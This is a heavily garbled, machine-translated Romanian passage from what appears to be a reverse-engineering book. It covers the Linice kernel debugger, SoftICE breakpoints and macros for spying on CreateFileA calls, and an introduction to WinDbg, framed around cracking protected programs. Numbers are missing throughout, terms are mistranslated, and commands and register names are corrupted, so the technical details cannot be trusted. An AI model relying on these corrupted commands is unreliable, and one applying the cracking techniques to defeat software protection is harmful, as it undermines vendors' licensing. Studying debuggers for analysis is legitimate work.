(gratuit) □ „CTRACE MANUAL” (http://ctrace sourceforge net/manual htm) - Documentare detaliată privindutilizarea bibliotecii CTRACE (în engleză limba) □ Kernel- und Users Space Debuging Techniken (http://www unfug org/files/debuging pdf)- Rezumate dedicatedepanicării și dezvăluirii detaliilor puțin cunoscute ale structurii GDB (în germană) □ Inversare Inverse Des SystemsELF/Intel (http://www sestic org/sstic /articles/sstic -vanegue roy-reverse intel elf pdf)-study și depanareafișierelor Elf în I fără I (pentru franceză) Capitolul Caracteristici ale depanului termonuclear cu UNICE OFWorthy Kernel Debuggers și există puține sub Windows, iar pe Linux pot fi numărate pe degetele unei mâini Și chiar și încea mai mare parte, sunt încă crude și neterminate sau luate și nu sunt acceptate Excepția plăcută este doar una dintreele - linice, care este cea mai populară și interesantă După cum puteți ghici pe nume, Linice este legendarul softice,neoficial portat la Linux Cu toate acestea, de fapt, acest lucru nu este așa Linice nu este un „port”, ci un proiectindependent scris de la zero și distribuit în textele originale în mod gratuit Acest debugger a moștenit interfața (Fig ) de la Softice, sistemul de comandă și majoritatea capabilităților, inclusiv suprafața de cheie la cald (în liniceeste + ), instalarea punctelor hardware pentru toate funcțiile și sistemul Apeluri, vizualizarea GDT/LDT/IDT,pagini fizice ale memoriei În plus, Linice a împrumutat o serie de capacități de la GDB, inclusiv: □ Apelarea uneifuncții arbitrare prin comanda de apel □ Conservarea/restaurarea contextului registrelor □ variabile interne, etc Spredeosebire de majoritatea celorlalți debugători care lucrează prin non-thorough ( Pop-coeneral) și mecanismul PTRACE ,descris în capitolul , este ușor detectat de apărare, Linice folosește o urmă „nativă”, la fel ca în Softice, ceea cepermite ambelor debuggeri să depanim programe protejate serios pe care alți debuggeri nu le mai pot face față Parteaprincipală a codului destinată nucleului a fost scrisă de germanul Haran DeVie Haran Devie, dar oameni completdiferiți au fost angajați în nucleul nucleului: Daniel Reznick, Peter K și Carlos Manuel Duclos Vergara Și compatriotulnostru - Oleg Khudakov - Rescrieți fișierele de asamblare de la NASM la GCC Textele inițiale sunt pe site -ul oficial alproiectului - http://www linice com, există și documentație, frecvențe de întrebări scurte și un link către forumulhttp://groups google com/group/linice Nu există ansambluri binare pregătite Rețineți că procesul de compilare,construcție și configurare a liniei va fi descris mai târziu în acest capitol (a se vedea „Compilarea și configurarealiniei”) Dacă vă aflați într -o situație similară, lucrând cu alte proiecte, este recomandat să citiți cu atențieînsoțirea Documentare pentru proiectul corespunzător Instrucțiunile minime necesare pentru acest caz au fost prezentateîn capitolul (a se vedea „Potențialul ascuns al ansamblurilor manuale”) WMDOWS Analogul acestui mecanism estedebug process folosit de depanatorul aplicat Capitolul Caracteristici de depanare termonucleară cu Linice Fig Cerințe ale sistemului de depanare Linice Cea mai recentă versiune a Linice este numărul și datat / / Suportă pe deplin Linux x Core și Consola VGA Există probleme grave cu mai mulți nuclei noi, iar miezul x este menținut doar în mod limitat Debuggerul a fost dezvoltat și testat în cadrul Debian , compatibilitatea cualte distribuții nu este garantată De fapt, deținerea lui Debian pe mașina dvs doar pentru a lucra cu Linice estedestul de normală Din când în când, când Softice nu a existat încă pentru Windows NT, mulți hackeri au instalat Windows X exclusiv în scopuri de hacking, deși principalul lor sistem de operare de lucru a fost Windows NT Întrucât esteaproape imposibil să acoperiți toate subtilitățile instalației Linice în cadrul unui capitol, ne limităm la o descrierea compilării și lansării Linice doar sub o singură distribuție Ca atare de distribuție, a fost selectat Kporich cuun nucleu de într -un mod VGA de consolă Linice acceptă mașini ASRI și multiprocesor, dar este prost prieten cucochilii X Acest lucru se observă mai ales pe plăcile video care sunt diferite de nvidia (în același timp nu acceptădeloc adâncimea de culoare pe de biți) Prin urmare, depanarea aplicațiilor X este mai convenabilă pentru a efectuaprintr-un terminal la distanță conectat de un port COM pe protocolul VT , în timp ce tastatura locală va funcționa șicu Linice Vorbind despre tastaturi Întrucât Linice interacționează direct cu echipamentul, acestea nu sunt acceptate deUSB-Keyboard Utilizați tastatura Standard PS/ (DIN), dar dacă nu o aveți, deconectați suportul tuturor dispozitivelorUSB din Linux, forțând BIOS -ul să imite tastatura PS/ acceptată de Linice Partea a II -a Tehnici de bază dehacking fig Reacția VMware la o încercare de lansare a liniei sub Mașinile virtuale (și, în special, VMware ) Linice, fie nu se încarcă, fie nu se încarcă deloc, dar nu răspund latastatură (Fig ), fie sfâșie acoperișul cu o mașină virtuală, forțându -ne să lucrăm la un " trăind „glanda Desigur,acest lucru este rău Cu toate acestea, tehnologiile de emulare sunt îmbunătățite continuu și există o speranță că, dupăun timp, această problemă va fi rezolvată Compilarea și configurația linice, în primul rând, trebuie să descărcațiarhiva GZIP cu textele originale de linie (http://www iinice devic us/linice- tar gz), care ocupă puțin mai puținmegabyte După descărcarea arhivei, despachetați -o pe disc, accesați directorul,/documente și citiți cu atenție fișierulREADME Debuggerul este asamblat sub nucleul , așa cum se arată în lista Listarea Compilare și aspect pentrunucleul # CD Build # /Make Bin- # CD /Bin # Make Clean;Rețineți că, înainte de lansare, vă face să deschidețifișierul,/bin- /makefile și editați linia țintă în conformitate cu configurația și arhitectura platformei țintă Înspecial, pe ASR-Machines cu procesoare multi-core sau hiperthreading, acesta va arăta așa cum se arată în lista GPAVA Caracteristici de depanare termonucleară cu UNICE LISTING Configurarea liniei de debugger, Target =-DSMP DIO APIC După ce compilarea în catalog este finalizată Vor apărea fișiere și cataloage Cele mai semnificativedintre ele sunt modulul Linsym-Boot al debuggerului, lince dat-fișierul de configurare, XIC-Support pentruX-SHELL ; / ips / ips o - Un modul de nucleu încărcat care conține direct depanatorul în sine După ce am colectatkitul minim de lucru, ar fi frumos să asamblezi restul distribuției, inclusiv exemple de depanare demonstrativă (sunt încatalog /Test sunt compilate de scriptul de compilare), precum și modulul de expansiune (se află în Catalogul,/ext,este asamblat încărcat de comanda INSMOD) Nu există niciun beneficiu practic special din partea acestuia, dar studiindtextul sursă, puteți scrie propriile module care extind funcționalitatea linice Procesul de construire și configurare aliniei de depanare este prezentat în fig Orez Procesul de construire a unui debugger la linia de încărcare asistemului și pornirea debuggerului la încărcarea Knoppix LiveCD (Fig ) în linia inferioară a ecranului, apare oinvitație de pornire: ca răspuns la care Knoppix VGA = Linia normală ar trebui să fie înscris Parametrul de pornireselectează Knoppix (încărcat automat în mod implicit, astfel încât reglarea Knoppix poate fi coborâtă) Parametrul blochează încărcarea shell-ului X, iar parametrul VGA = normal stabilește modul VGA standard cu o rezoluție de x Când lucrați în modul text, acesta poate fi eliminat Partea a II -a Tehnicienii de bază ai hackingului ■KJYWțGNET ►Se Keys F sau F pentru opțiuni de ajutor și boot pentru a seta parametriide încărcare: vga = normal Vă rugăm să rețineți că linia Knoppix nu este necesară, deoarece nucleul a fost dejaselectat După finalizarea încărcării, acordați comanda de conectare și introduceți sistemul ca utilizator al rădăcinii(se presupune că contul a fost deja creat în avans) Procedura de înregistrare în sistem este prezentată în Fig Pentru a instala Knoppix pe un hard disk, rulați sesiunea LIVECD și dați comanda sudo Knoppix-Innstaller în fereastraterminalului GPAVA Caracteristici de depanare termonucleară cu scanare Linice pentru DeUits USBZFireUire Done Enabling DMA acceleration for: hda [UMuare Uirtual IDE CDROM Driuel Enabling DMA acceleration for: hdb[UMuare Uirtual IDE CDROM Driuel Accessing KNOPPIX CDROM at zdeuzscdO Total nenory found: ® kB Creating zrandisk(dynanic size= k) on shared nenory Terminat Crearea de directoare și Synlinks pe rânndisk terminat Procesulinit Itarting IMIT: Ursion Z -Knoppix Booting Running Linux Kernel Z Z Procesor • IS Pentiun III (Coppernine) MHz, Z KB Cache Acpi RIO găsite, noduli care acționează: Procesor de ventilator cu butoaie de baterie AC Thernalusr găsit, nanzat de hotplug: (re) Scanare usr deuices Sync: [ML făcut Deuices Done Mouse Iseric PSzz UheelMouse la Zdeuzpsaux Soundcard: ES IAUDIOPCI- DRIUER = ESL AGP Podul detectat Uideo este UmUare InciuiUirtual Sugă, folosind Xfree (UNUARE)Monitorul seruer Iserer Monitor, H: Z F- TKHZ, U: ®® ®- , ®Hz Utilizarea modurilor ®Z X " ®X " ®X ® Scanare" ®X E" pentru despărțiri harddisk și creând zetczfștab făcut Metuork Deuice Etho detectat, difuzarea DHCP pentruIP (Rackgrounding) Autonaunter a început pentru: floppy cdron cdronl IMIT: Intrarea Runleuel: Z Fig Sistem Kporich,încărcat fără cochilii X în modul console VGA Fig Linice Lansare Debuggerul este realizat de comanda /LinsyM -i,după care debuggerul apare imediat pe ecran Dacă acest lucru nu se întâmplă, încercați să specificați cheia -Verbose pentru a retrage mesajele de diagnostic Procesul de pornire a debuggerului este prezentat în Fig Unuldintre motivele refuzului de încărcare poate fi lipsa unui fișier /boot/system map care conține adresanucleului Încărcarea va eșua și dacă conținutul fișierului System map nu corespunde miezului curent, care poate apărea,de exemplu, atunci când este încrucișat Unele compilatoare de distribuții fie nu includ System map în partea a II-a Tehnicile de bază ale hacking -ului distribuțiilor lor sau pun ceva complet „stânga” și de neînțeles de nicăieri Înastfel de cazuri, este suficient doar să traversezi miezul, indicând calea către fișierul System map folosind cheia-show, dacă acest fișier este localizat în catalog, excelent de la /boot Astfel, siguranța nu va suferi, iar Linice vaputea funcționa Debuggerul de linii, uscat în modul consolă VGA, este prezentat în Fig Orez Debuggerul Linice,lansat în modul console al VGA, este returnat de la debugger la sistem pentru a apăsa tasta sau pe comanda lui X Combinația de + provoacă un debugger din orice program Cu toate acestea, nu este deloc faptul că ne vomregăsi în contextul său, deoarece Linux este un sistem multitasking care schimbă procesele unul după altul și comenzilecontextului contextului (analog al comenzii addr în Softice) În linia vocabularul încă nu există Nu se știe când apareși dacă apare deloc Prin urmare, trebuie să scârțâiești, setarea punctelor de oprire pe apelurile sistemului utilizatede un program specific sau încălcarea procesului conform metodei H, despre care vom vorbi acum Pentru descărcareadebuggerului (dacă doriți cu adevărat să îl descărcați), este responsabilă cheia -x, transmisă de același modulLinsym Bazele de lucru cu Linice pentru cei care au lucrat deja cu Softice, Mastering Linice nu vor prezenta nicioproblemă Toate aceleași echipe sunt utilizate aici: D - Dump Memory, E - Memorie de editare, T - Step -By -pasp Urmă, P- Urmăriți fără a intra în funcție, R - Vizualizare/Modificare a registrelor, VRM/WRH - Setarea opririi Punct pentruacces/execuție a memoriei și execuției memoriei și etc O listă completă de comenzi este conținută atât în ​​sistemul dereferință construit, numit la comanda Help , cât și în documentația standard Apăsați combinația de tastatură + și uneori în lista de procese afișate pe ecran de comanda PROC (Lista ) Vă rugăm să rețineți că procesul curent ieseîn evidență în albastru (în prospect - într -un font semi -fat) Acționând în acest fel, compilatorii distribuțieiconsideră că acest lucru va spori securitatea sistemului, deoarece va fi mai dificil să intercepteze apelurilesistemului (Syscalls) Pentru a obține informații suplimentare despre o echipă specifică, introduceți: Help Name Command GPAVA Caracteristici de depanare termonucleară cu Linice Listarea Process Licks afișate de Proc:Proc Pid Task State Uid Gid Nume C C E Sleeping F EE Sleeping Keventd F EE Sleeping Ksoftirqd CPU * F EE Sleeping KSOFTIRQD CPU F ED Sleeping KSWAPD F EAA Sleeping BDFLUSH F EA SLOWM KUPDED BDFLUSH F EA DOMENTE KUPDED BDFLUSH F EA SLOWM KUPDEDAT OUMALD F A RUNDING AUTAMOUNT F E de dormit CUPSD F DDE Sleeping MC F DD Sleeping Cons AMENT VEDERESMENT Procese este, desigur, bun Darcum să depanați programele?Cel mai simplu lucru este să introduceți comanda SIS Machine în punctul de intrarecorespunzătoare instrucțiunilor IC, după înregistrarea conținutului octetului original Acest lucru poate fi făcut deorice editor Hex, De exemplu, editorul NT (Fig ) F J Secțiunea Adresa virtuală F Dimensiune virtuală Offset File O F FISE FISE FUNCȚIE START (GLOBAL) Punct Entrv executabil!entrvpoint: int in f U U U f a f b f el e fB f f Ж c f f f e c ЭС e feffff f MOV and push push push push push push push caii hlt nop nop function call gMon start (local)esp!Bfffffffffbh libc csu fini libc csu init wrapper b dd b '' '' '' v '' '' 'l-ar, I Fisher Utilizareaeditorului HT pentru a introduce fișierul fișierului Partea II (mod) tasta, selectați opțiunea ELF/imagine,reglați cursorul la punctul de intrare marcat :, faceți clic pe (editați) și schimbați primul octet de pe CCH Salvați modificările apăsând tasta l ;X; Partea a II -a Tehnicile de bază ale hackingului Ce s -aschimbat?A existat o concluzie a numelui fișierului: D Esp-> L , unde D este comanda de afișare DAMPA, esp> -indexpentru primul argument al funcției createfilea (ce să se deschidă), AU -numărul de octeți pentru ieșire (valoareaspecifică este selectată după gust) Opțiune actualizată Faceți clic pe + , lăsați debuggerul și executați unprogram pe care trebuie să îl urmăriți (de exemplu, departe Administrator) Apoi apăsați + din nou, accesați debugger și dați comanda BD pentru a opri spionajul Rămâne săpărăsești Softice, să mergi la Loader Symbol și să păstrezi povestea pe disc Rezultatul obținut de această dată esteprezentat în lista 'Listarea Un fișier avansat de revistă care afișează nume de fișiere!Pauza din cauza bpxkernel 'createfilea face "d esp-> l ; x;"(ET = , secunde) : E F - Conut $ Conin $ : f - D F nterface mouse % pauză(ET = , milisecunde) : F - E Conin $ Interface : A D - pentru pentru pentru pentru Mouse %C % d:%pauză(ET- milisecunde) : pentru c - d C: \ Fișiere de program : C - E \ Far \ Fareng ing Un lucru complet diferit!Acum este afișat numele fișierului deschis,iar spionul nostru improvizat este puțin, puțin începând să funcționeze Cu toate acestea, jurnalul încă nu are elementede date atât de importante precum identificatorul procesului care a provocat o funcție ari și codul de retur Dar ce artrebui să mai adăugăm câteva linii la punctul de oprire?Versiunea finală a punctului de oprire destinat în scopuri deprotocol este prezentată în lista Bpx createfj iea do "? Pid; d esp-> l ; p ret;? EAx; x;"Echipa este aici?PIDafișează identificatorul procesului, R RET efectuează o funcție ari, așteptând o întoarcere și echipa?EAH raporteazăconținutul registrului EAX, în care există un cod de retur din funcția Ari Lista arată un fragment dintr -o revistăobținută folosind un punct de oprire prezentat în lista Listarea »Versiunea finală a pauzei de fișiere arevistei din cauza BPX Kernel 'CreateFileA face"? Pid; D esp-> l ; p ret;? Eax; x; "" DC ;PID : E F CD SNAI EXE A E : C E "T";Pauză de cod de întoarcere datorată bpx kernel 'createfilea do "? Pid; d esp-> l ;p ret;? Eax; x;" DC "C^" ; PID : C D F E B- E F demo crk exe a e : C E - Pid;D ESP-> L ;P ret;?EAX;X; DC ; PID CAPITOLUL Discuții extinse despreproblemele de depanare : D D F - E DEMO PROTEDED S : S : RK EXE "T"; Codul detuni este deacord că, cu acest raport, este deja posibil să funcționăm! DORINIT, acest filtru poate fi complicat prin adăugarea denoi criterii Formatul protocolului poate fi îmbogățit și cu noi detalii, afișând toate detaliile necesare care pot finecesare doar (de exemplu, conținutul stivei de apeluri) Desigur, Această cale nu se descurcă fără probleme Softice-ulconstant este urât și reduce semnificativ productivitatea Este posibil să-l forțezi cumva să efectueze un protocol fărăa emite? Poate!Cântând debuggerul Din păcate, împreună cu aceasta, secvența echipelor care urmează este suprimată, ceeace înseamnă că crearea de rapoarte detaliate devine imposibilă Prin urmare, în scopurile noastre, această metodă nu estepotrivită Din păcate, nu există alte mijloace de a suprima screeningul debuggerului la dispoziția noastră O altă sursăde durere de cap devine gunoi în protocol Datele utile sunt amestecate cu alte informații afișate pe ecran Este clar căcomoditatea lecturii nu este vorba!Fără a scrie o utilitate specializată pentru formatarea rapoartelor, păcălițiliteralmente în marea informațiilor inutile Puteți, desigur, să scrieți această utilitate pe Perl, dar există un lucrumai simplu cale Aceasta este utilizarea macro -urilor Cu toate acestea, de data aceasta nu va fi macro -uri softice, ci macro-urile încorporate în Far Manager Rulați Far Manager, apăsați tasta și vizualizați cu atenție textul afișat înlista După cum puteți vedea, fiecare porțiune de informații despre „raportare” începe cu ruperea liniei dincauza Asta ar trebui căutat!Faceți clic pe + Pentru a începe înregistrarea macro -urilor, apoi apăsați tasta , introduceți linia pentru căutare (în sfârșit, apăsați tasta Acum, utilizând combinația de tastatură + Selectați un fragment de text de la sfârșitul pauzei din cauza liniei până la începutul createfilea Acesteinformații sunt redundante, deci ștergeți -o folosind o combinație + Apoi faceți clic pe combinația de + + > pentru a merge la cuvântul cheie, care ar trebui să fie eliminat și cu reziduul liniei Cu altecuvinte, continuați să editați textul în conformitate cu cerințele dvs Rețineți că acest proces este dificil de descrisîn cuvinte, este mult mai ușor să arătați rezultatul final Când macro -ul este creat, va fi suficient să o aplicați laprotocol un anumit număr de ori (trebuie doar să apăsați combinația de taste atribuită și să nu dați drumul), ca urmarea căruia rezultatul se va dovedi a fi despre Rezultat ca în lista Listarea O versiune îmbunătățită aprotocolului, eliminată de informații în exces folosind macrosul createfilea nou creat, PID: LDCH;Nume:CD Snail exe;RET: H CreateFileA, PID: LDCH;Nume: demo crk exe;Ret- h createfilea, pid: ldch;Nume:demo proted crk exe;RET: H este un rezultat destul de demn pentru câteva minute de muncă!Cu ajutorul macro -urilor,puteți face totul sau aproape totul!Și lăsați un zâmbet disprețuitor, spun ei, această cale este neprofesională și, îngeneral, Principalul lucru este că sarcina a fost finalizată în timp record Așa cum am menționat deja, dacă doriți săutilizați o abordare mai profesională, va trebui să scrieți un utilitar specializat pentru formatarea rapoartelor (deexemplu, pe Perl) Filtre mai complexe încă nu au creat nimic mai complicat decât obișnuitul Ari-Spy O mulțime de astfelde utilități, gata de utilizare, pot fi găsite pe internet Deci a fost grădina la gard?A meritat!Pentru început, Softice(mai ales atunci când utilizați puncte hardware ale Stop Partea II Tehnici de hacking de bază precum BRSCH) estemult mai puțin conflict decât majoritatea spionilor Funcționează cu ușurință acolo unde alte fonduri nu mai pot facefață Nota este valabilă mai ales dacă anterior perforați softice folosind pachetul Icext, care ascunde debuggerul deunele mecanisme de protecție, în plus, tot ceea ce este interesant abia începe!Să complicăm puțin sarcina Vom spiona nupentru toate fișierele, ci, să spunem, doar pentru cei ale căror nume încep cu litera „A” Nu este dificil să faci acestlucru (lista ) Listarea Punctul de oprire al fișierelor în fișiere, ale căror nume încep bpx createfilea dacăbyte (*esp-> ) == a 'do xxx problema este că, dacă funcțiile createfilea sunt transmise în funcție, punctul nostru deoprire, punctul nostru de oprire Nu mai este, va funcționa, deoarece verifică doar primul simbol al numelui și nu existăfuncții de căutare a unei setări în arsenal softice, vai, După cum spun ei, această posibilitate nu este furnizată înmod constructiv, ci păcat Cu toate acestea, această problemă mică nu se va opri Vom proceda de la faptul că memoria carese află deasupra indicatorului stivei este de obicei liberă și poate fi folosită la discreția ta Ce se întâmplă dacăscrieți acolo un program de asamblare minusculă și transferați controlul?Dacă se dovedește acest lucru, atunci putețicrește nelimitat funcționalitatea debuggerului, fără a apela la plugin, care sunt de obicei voluminoase, stângace și,apropo, sunt slab documentate Pentru a finaliza programul de pe stivă, avem nevoie, evident, de o stivă efectuată Pânăde curând, aceasta nu a fost o problemă, iar în stivă a fost posibil să executați niciun cod fără niciun truc Cu toateacestea, acum situația s -a schimbat În vârful luptei împotriva virușilor și viermilor de rețea, producătorii deprocesoare au fost cooperați cu Microsoft, iar acum în cele mai recente versiuni ale Windows XP, Windows Vista șiWindows Server Longorn, Stack este protejat de performanță în mod implicit Cu toate acestea, la prima încercare de aefectua codul mașinii în stivă sau în împrejurimile acesteia, sistemul aruncă o casetă de dialog care oferă fie pentru aopri apărarea, fie pentru a finaliza din nou activitatea programului care se comportă incorect Pentru a face planul,trebuie să facem următoarele: □ Puneți codul mașinii funcției noastre deasupra vârfului stivei □ Salvați registrul EIRcurent și registrul EFLAGS (de exemplu, în aceeași stivă) □ Salvați toate toate Registrează că funcția noastră seschimbă □ Instalați EIR la începutul funcției noastre □ pentru a transmite argumentele (de exemplu, prin registre) □ pentru aîndeplini funcția prin returnarea rezultatului lucrării, de exemplu, prin EAX □ pentru a analiza valoarea returnată,efectuând anumite operații Registrul de pavilion □ Continuați execuția normală a programului sună intimidant, dar nueste nimic complicat în acest sens Să încercăm mai întâi să efectuăm EAX, EAX/RET Cum se transferă în codulmașinii?Puteți, desigur, să folosiți Hiew sau chiar FASM, dar puteți face acest lucru fără a părăsi Softice Pentru aface acest lucru, este suficient să vă deplasați în orice regiune liberă de memorie și să dați comanda a (asambla) Vărugăm să rețineți că, înainte de aceasta, trebuie să vă asigurați că sunteți în contextul CPAVA depanat Discuțieextinsă a problemelor de depanare (numele său este afișat în colțul din dreapta jos al ecranului), și nu în nucleu,altfel va apărea sistemul Procesul funcției de asamblare în softice este prezentat în lista J Listarea Ассемблированиелользовательской функции в SoftICE :а esp- : B DC xor еах,еах : B DE ret : B DF :d esp- : B DC СО СЗ DB FB - АЕ F FF FF FF FF W W : B ES D E - C yh Acum, programul se află pe stivă, dar cum să -l executați?Da, foartesimplu!Dacă doar DAG Command G ESP-Y (accesați adresa ESP) și dați procesorului să iasă cât poate, atunci este puținprobabil să facă față acestei sarcini Pentru a returna conducerea la adresa actuală a programului depanat, mai întâitrebuie să salvați registrul ER, iar acest lucru nu este atât de simplu E (esp-yu) eir nu funcționează, deoarece nupermite utilizarea expresiilor (iar numele registrului este o expresie) Prin urmare, încercarea de a efectua o astfel decomandă se va încheia în eșec și veți vedea mesajul de eroare de sintaxă (eroare sintactică) Cum să fii?Ce sa fac?Săfolosim echipa și (pantoful), copierea blocurilor de memorie de la o adresă la alta Apoi, vom putea salva un fragmentdin programul original pe stivă și vom modifica programul în sine la discreția noastră Mai exact, va trebui săînregistrăm Push EAX/MOV EAX, ESP/Sub EAX, LOH/Call EAX sau o secvență similară de comenzi Pe scurt, avem nevoie de oechipă de apel ESP-N, dar din moment ce nu există o astfel de echipă în Lexicon X și nu a existat niciodată, trebuiesă o imităm prin transformările matematice cu vreun registru suplimentar De exemplu, să fie registrul EAX În codurilemașinii, va arăta astfel: H/ BH C H/ H E H H/FFH D H, acum vom copia un fragment din programul depanat pentruStack: și Eir L io ESP- , unde receptorul ESP situat deasupra Semne ale stivei și nu frecă programul nostru demașini Acum modificăm împrejurimile programului depanat: Ed EIR S V O;Ed EIR+ D FF E După cum puteți vedea, acestaeste același cod, tastat doar în ordine inversă, deoarece în procesoarele x octetul mai tânăr este situat la o adresămai mică În acest sens, etapa pregătitoare poate fi considerată finalizată Dăm comanda t (urmă), repetând aceastăcomandă de patru ori înainte de intrarea în funcția noastră, apoi comanda rft pentru ieșirea de acolo Si tot!RegistrulEAX conține acum zero!Funcția noastră și -a finalizat munca și a returnat tot ceea ce mi -am dorit!Nu este minunat - săexecutați propriul cod scris din foaia curată direct în debugger?Rămâne o singură problemă - cum să analizați valoareareturnată în depanare?Dacă încercați să mergeți într -un mod direct: dacă eah == ) faceți xxxx, atunci vă așteaptă uneșec complet Cert este că Softice nu percepe comenzi condiționate, iar cuvântul cheie dacă poate fi găsit doar înpunctele opririi Ei bine, să creăm un punct de oprire fictiv în acest scop, care funcționează întotdeauna (lista ) Listarea Punctul fictiv al opririi vă permite să utilizați cuvântul cheie dacă dacă eir if (eax == ) facețixxxx în mod natural, indiferent dacă punctul de oprire va funcționa sau nu, trebuie să restabilim registrul EAX Partea a II -a Tehnicile de bază de hacking, notă, nu uitați de EFLAG -urile de înregistrare, care ar trebui, deasemenea, salvate Procedura de conservare este similară cu procedura de păstrare a registrului EAX și, prin urmare, nueste luată în considerare aici După păstrarea registrelor, este necesar să returnați un fragment din programul inițialîn poziția de pornire și să eliminați punctul fictiv al opririi, deoarece numărul de opriri ale opririi nu estenelimitat În ceea ce privește registrul EAX, acesta poate fi restaurat de echipa ROR EAX în urma Call EAX Proiectarea MESP- L EIP- va ajuta la returnarea programului în loc De unde a venit argumentul EIR- ?Pe de altă parte, nu doareir?Cert este că în procesul de efectuare a „patch -urilor” Valoarea EIR s -a schimbat!Numărul este dimensiunea „patch -ului” nostru împreună cu echipa ROR EAH Rămâne doar să daicomandamentului r eir-eir- pentru a returna EIR în loc, iar implementarea programului depanat poate fi continuată însiguranță Dacă totul a fost făcut corect și niciun mecanism de protecție nu a folosit stiva neutilizată, atunciprogramul depanat nu se prăbușește Apropo, o notă, sub Windows X, cu o anumită probabilitate, va apărea cu toateacestea eșecuri, deoarece aceasta este activă în stivă Pentru a nu -i permite să se adune, registrul ESP ar trebui săfie tras în momentul executării tuturor operațiunilor, apoi să se întoarcă la poziția de pornire din nou, din nou, defiecare dată pentru a tasta codurile de mașină este complet opțională Lecția este obositoare și nu o poți numiplăcut Aici vor veni macro -urile la îndemână!Oferim comanda macro macrojname = "xxxxx" și punem macro pe listaconstantă Aceasta se face după cum urmează: Start Symboladator, selectați Setări de inițializare Editare | Softice dinmeniul principal, accesați definițiile macro, faceți clic pe Adăugare Buton și macro adecvat) și corp (definiție) AcumMacro se va încărca automat cu softice Puteți crea o întreagă bibliotecă din propriile puncte condiționate extinse deoprire, funcții de susținere, cum ar fi căutarea trupelor sau compararea liniilor după șabloane și acest lucru poate cuadevărat să fie făcut și apoi Softice Power în mod repetat va crește În plus, veți avea o oportunitate minunată de aexersa programarea la nivelul codurilor de mașini! Apropo, macro -urile vă permit să rezolvați o altă problemă Certeste că Softice nu acceptă Punctele cuibărite ale opririi, pe care nu le putem face fără (după cum vă amintiți, pentru aanaliza conținutul registrului EAX, a trebuit să recurg la crearea unui punct de oprire fictivWA) Dacă încercăm săscriem: bpx createfilea face "xxx; bpx eir do" xxxx "; x;", nimic nu va funcționa!Softice va confunda în ghilimele și varefuza procesarea unui astfel de design Dar dacă aranjați comanda eir face "xxxx" sub forma unui macro, numit, deexemplu, xyz, atunci designul bpx createfilea face "xxx; xyz,- x;" "" ""Acesta va fi perceput de debugger destul defavorabil Urmărirea animată în Softice Unele debuggkers (de exemplu, Ollydbg) au o funcție utilă care nu este însoftice Aceasta este posibilitatea unei animații cu pas cu pas cu puncte de oprire condiționate la fiecare pas Deexemplu, puteți pune un punct de oprire pe testul EAX, EAX/JX XXX Design, forțând debuggerul să apară ori de câte oriregistrul EAX va fi zero (sau orice altă valoare pentru alegerea dvs ) Proiectarea care stabilește un astfel de punct deoprire poate arăta, de exemplu, astfel: vrh if (*word (eir) == xs && (*byte (eir+ ) & h) == h) Aici xc esteopcodul testului EAX, EAH Team, iar H este masca instrucțiunilor JX Întregul punct de oprire în ansamblu vă permite săprindeți structuri software precum F (func ( )! = ) care este adesea utilizat în mecanismele deprotecție Softice nu înțelege astfel de glume și necesită ca adresa punctului de oprire să fie definită clar, deexemplu, vrh eir Mai mult decât atât, chiar și în acest caz, el creează un singur punct de oprire, pe baza valoriicurente a EIR (așa cum a fost la momentul creării punctului de oprire) și refuză să -l „povestească automat” în cursulexecutării programului Ce păcat!GPAVA Discuții extinse despre problemele de depanare și, de dragul acesteioportunități, mulți hackeri abandonează softice -ul obișnuit și trec la OililyDBG Între timp, problema poate firezolvată prin softice!Cert este că în softice macro -urile pot fi investite!Încercați să scrieți macro xyz = "t;Xyz,-", tip XYZ și vezi ce se dovedește Softice va începe să animăm programul! Nu prea rapid, dar totuși destul deproductiv În orice caz, pentru a combate pachetele și protectoarele, acest lucru este destul de potrivit Deoarece amînvățat să Animizați programul, crearea de puncte condiționate nu va mai reprezenta o problemă serioasă Aici, deexemplu, este un astfel de macro utilă: macro xyz = "vrh eir; t, -xyz;" Ce face?Dar ce!El alocă traseul programului,punând codul executat și vedem imediat ce tranziții condiționate au fost executate și care nu sunt (Fig ) Înacelași timp, totuși, trebuie avut în vedere faptul că numărul de opțiuni ale opririi este limitat și, prin urmare,trebuie eliminat periodic Orez Macro, plasarea comenzilor softice executate este un instrument cu adevărat puternicde putere distructivă extraordinară, care permite hackerilor să facă tot ce este necesar și chiar mai mult decâtatât!Principalul lucru este să ai o fantezie Protocolarea nu este singura profesie alternativă de softice Dacă doriți,puteți construi un amortizor excelent sau altceva din el Dar acesta este subiectul unei alte conversații Principalullucru este să apucați ideea Acest capitol nu este El oferă soluții gata, dar este conceput pentru a vă atrage atenția asupra unui întreg strat de oportunități pe caretoată lumea le poate folosi la discreția lor Debuggerul Windbg ca versiuni timpurii ari și RPC ale debuggerului Windbgde la Microsoft nu au folosit o popularitate mare în rândul hackerilor, iar toate s-au sprijinit pe Softice Cu toateacestea, acum, când sprijinul acestuia din urmă este oprit și este sortit să moară încet, dar inevitabil, se puneîntrebarea: cât de mai departe din Partea a II -a Tehnicile de bază de hacking live și ce să folosești pentruhacking?Între timp, Windbg s -a maturizat foarte mult și, printr -o serie de caracteristici, poate fi deja comparată cusoftice, sau chiar ocolește Această secțiune va arăta cum să folosești Windbg ca Ari- și RPC SPY Microsoft WindowsDebugger (Windbg) face parte din multe produse: Platform SDK, Kit de dezvoltare a șoferului (DDK), Windows DriverFoundation (WDF) și vine, de asemenea, cu instrumente independente de depanare pentru Windots, care ocupă puțin mai multWindbg de la depanare Instrumentele pentru Windows Kit este de obicei cel mai proaspăt și care conține cel mai marenumăr de tot felul de extensii benefice Îl puteți descărca aici: http://www microsoft com/whdc/devtools/debuging(versiuni de de biți și de biți) Pachetul este furnizat gratuit, iar Microsoft nici măcar nu necesităautenticitatea unei copii a Windows, în orice caz Prima cunoștință cu Windbg Windbg Debugger este prezentată în două„iPostasi”: i kd exe (pentru - BIT VERSIUNEA-IA KD EXE) -COLE) Debuggerul nivelului nucleului (Fig ), caredepanează doar șoferii împreună cu depozitele nucleului și necesită cel puțin două mașini conectate prin cablu prinporturi SOO sau interacționând prin rețea prin rețea Notă Dacă nu există două computere la dispoziție, puteți utilizaemulatorul VMware care acceptă adaptoare de rețea virtuală și vă permite să depanați printr-un port SOM virtual În ciudafaptului că i kd exe este un debugger destul de puternic și bun (subcordată Windows " ) ), nu va fi necesar îndetaliu scopurile noastre de hackeri P All "IRESETTING implicit Domeniu DL, [ECX] DS: : E C =? StrckText: urrnihg: Stack lnwind Informnation Not AVALABLE Following franes e e f c e d e a d e»i n - x c x FOLLOHUPJP: » n * f all eovSVtBOL ST CK M)EX: F L WUP NRME: MachineOmer 